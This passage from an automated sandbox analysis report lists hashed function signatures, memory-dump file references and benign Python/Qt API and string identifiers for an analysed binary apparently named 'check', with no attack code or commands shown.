                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLong
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 2610644205-2407233842
                                                                                                                                                                                                                                          • Opcode ID: 3e0e32757434ec80e3b79828fe032dc9b677b45b792b156fa140777409428cee
                                                                                                                                                                                                                                          • Instruction ID: 14d9c839905310c62bc7a3581a41d9c43ed55fe0ca2dcbc50b4d2790e031d18c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e0e32757434ec80e3b79828fe032dc9b677b45b792b156fa140777409428cee
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A821FF77A09B81C2EA508B55F44526EA3A0FF84FE4F444532EE8E13B68EF3CE1558704
                                                                                                                                                                                                                                          Function 00007FF89D99DD90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Bool_FromLong
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 2610644205-2407233842
                                                                                                                                                                                                                                          • Opcode ID: 0bd40943651bfcf23386b653e4a829f4714aad5142d183374797c4dbeade166f
                                                                                                                                                                                                                                          • Instruction ID: 5ecab4cac935cd7400890d2c22e83b7077ea269b9d85de2baa50d0ef15e64e66
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bd40943651bfcf23386b653e4a829f4714aad5142d183374797c4dbeade166f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A21ED3AA09B81C2EA509B55F44426DA3A0FF95FD4F444535EE8E03B68EF3CE1558708
                                                                                                                                                                                                                                          Function 00007FF89D9CBFB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ??0QString@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF89D9CC01C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: String@@V0@@malloc
                                                                                                                                                                                                                                          • String ID: QSyntaxHighlighter$highlightBlock
                                                                                                                                                                                                                                          • API String ID: 1360938472-1724829477
                                                                                                                                                                                                                                          • Opcode ID: 3c091128e6b523587925bcb7a584fd8045035d049bb998454d387b0c291e7010
                                                                                                                                                                                                                                          • Instruction ID: c06d5cc90df743ebfba04c2f4b8a1a3b591978a1d2093df2ff90775a32f44534
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c091128e6b523587925bcb7a584fd8045035d049bb998454d387b0c291e7010
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52114973A09B4586EB108B16E8406A973A5FB48FD4F480036EE8E17768EF3CF596C704
                                                                                                                                                                                                                                          Function 00007FF89ECA2080 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PyErr_SetString.PYTHON313(?,?,?,00007FF89ECA206C), ref: 00007FF89ECA4027
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89ECA21E0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00007FF89ECA20AF,?,?,?,00007FF89ECA206C), ref: 00007FF89ECA220A
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89ECA21E0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00007FF89ECA20AF,?,?,?,00007FF89ECA206C), ref: 00007FF89ECA2228
                                                                                                                                                                                                                                          • PyUnicode_FromOrdinal.PYTHON313(?,?,?,00007FF89ECA206C), ref: 00007FF89ECA20F5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747637090.00007FF89ECA0000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECA6000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECEA000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECF8000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ED47000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748309003.00007FF89ED4A000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748347304.00007FF89ED4C000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strncmp$Err_FromOrdinalStringUnicode_
                                                                                                                                                                                                                                          • String ID: name too long
                                                                                                                                                                                                                                          • API String ID: 2523643974-297623866
                                                                                                                                                                                                                                          • Opcode ID: b1071a3647cdc4e7ae4666dfd80745f1f378677fa78539d24b9830cbf3fa62bb
                                                                                                                                                                                                                                          • Instruction ID: d646840d020033dcb7e1de19f2360d51d5bdbfe571ea9ac25d574bd479833205
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1071a3647cdc4e7ae4666dfd80745f1f378677fa78539d24b9830cbf3fa62bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C116131B2864282EB74CB11E9C02796B62FB48FC8F541431EBAE43A94DF2CFC458710
                                                                                                                                                                                                                                          Function 00007FF89D989AC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DoubleFloat_From
                                                                                                                                                                                                                                          • String ID: QVector3D$x(self) -> float
                                                                                                                                                                                                                                          • API String ID: 329246742-1354567454
                                                                                                                                                                                                                                          • Opcode ID: b164fee976c082549ce9376180b61b546f2038105489a99689e004863fd58a94
                                                                                                                                                                                                                                          • Instruction ID: 1f070ada628893a4e37d79066cfbfadd6d15d8ba719580f63da210252540e518
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b164fee976c082549ce9376180b61b546f2038105489a99689e004863fd58a94
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C012136A04B4AD5DB10CF65D8496A933A4FB44FD4F918032CA9E07320EF7CE699C744
                                                                                                                                                                                                                                          Function 00007FF89D9B5A10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DoubleFloat_From
                                                                                                                                                                                                                                          • String ID: QQuaternion$z(self) -> float
                                                                                                                                                                                                                                          • API String ID: 329246742-1128012678
                                                                                                                                                                                                                                          • Opcode ID: 99039d9004db0801bcfc5a1a37d3018496c2abebcca86cea28bae023adb2a50d
                                                                                                                                                                                                                                          • Instruction ID: 4b921fd2b5ac653d96fff9291a93c059140b0b32bea0284830757554f303133d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99039d9004db0801bcfc5a1a37d3018496c2abebcca86cea28bae023adb2a50d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2011E32A08B4AC1DB10DF61E8496A977A4FB54BD4F918132CA9E03320EF7DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D99A0E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DoubleFloat_From
                                                                                                                                                                                                                                          • String ID: QVector2D$x(self) -> float
                                                                                                                                                                                                                                          • API String ID: 329246742-2271186758
                                                                                                                                                                                                                                          • Opcode ID: 2d2f080299449c0bfadf491cbc39ab9e6d5898c20bcf8bd3d3627ef2958e4810
                                                                                                                                                                                                                                          • Instruction ID: 37570b9c2e8712870df036562e9c83b37a333453161f03f2a10ce64f9e139a80
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d2f080299449c0bfadf491cbc39ab9e6d5898c20bcf8bd3d3627ef2958e4810
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24012136A08B46C5DB10DF65E8496A933A4FB44FD4F918032CA9E43320EF7CE699C744
                                                                                                                                                                                                                                          Function 00007FF89D97A070 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DoubleFloat_From
                                                                                                                                                                                                                                          • String ID: QVector4D$x(self) -> float
                                                                                                                                                                                                                                          • API String ID: 329246742-444826709
                                                                                                                                                                                                                                          • Opcode ID: d1a827893e5442eb33cb1219122b78be82d08ef09edb54bba468f41be848f23d
                                                                                                                                                                                                                                          • Instruction ID: 3801edd8f8d8433e083ff92f727068720e131ab602eda564867bc6fe6c2282af
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1a827893e5442eb33cb1219122b78be82d08ef09edb54bba468f41be848f23d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88011E36A04A46C5EB108F61E8496A933A4FB44BD4F914032CA9E07320EF7DE9A9C744